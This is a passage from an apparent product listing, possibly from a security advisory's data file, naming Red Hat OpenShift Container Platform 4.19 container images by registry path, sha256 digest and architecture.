"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
